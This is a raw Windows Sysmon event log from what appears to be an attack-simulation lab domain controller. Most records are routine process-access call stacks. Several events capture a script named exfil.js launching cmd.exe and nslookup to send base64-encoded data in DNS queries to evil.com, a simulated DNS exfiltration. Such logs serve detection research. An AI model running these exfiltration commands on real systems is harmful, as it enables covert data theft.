14:21:48.466{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.466{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.466{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.466{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.450{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F445-000000005F02}5624C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.450{2E1864BB-18E0-629A-6742-000000005F02}39763588C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-F445-000000005F02}5624C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.465{2E1864BB-18FC-629A-F445-000000005F02}5624C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlykzztts.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.450{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nliwhtgo.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.435{2E1864BB-18FC-629A-F245-000000005F02}81124192C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-F345-000000005F02}7672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.419{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.419{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.419{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.419{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.419{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F345-000000005F02}7672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.419{2E1864BB-18FC-629A-F145-000000005F02}20366228C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-F345-000000005F02}7672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.430{2E1864BB-18FC-629A-F345-000000005F02}7672C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-F145-000000005F02}2036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliwhtgo.tmp 2>&1 10341000x8000000000000000214625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.403{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-F245-000000005F02}8112C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.403{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FC-629A-F245-000000005F02}8112C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.403{2E1864BB-18FC-629A-F245-000000005F02}81124192C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-F145-000000005F02}2036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.381{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F245-000000005F02}8112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.381{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.381{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.381{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.381{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.381{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-F145-000000005F02}2036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.381{2E1864BB-18E0-629A-6742-000000005F02}39765484C:\Windows\System32\WScript.exe{2E1864BB-18FC-629A-F145-000000005F02}2036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.384{2E1864BB-18FC-629A-F145-000000005F02}2036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliwhtgo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.381{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvhrj.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.334{2E1864BB-18FC-629A-EF45-000000005F02}47286396C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-F045-000000005F02}4188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.855{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51207- 10341000x8000000000000000214611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.303{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{00000000-0000-0000-0000-000000000000}644<unknown process>-udpfalsefalse127.0.0.1-51206-false127.0.0.1-53domain 10341000x8000000000000000214609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 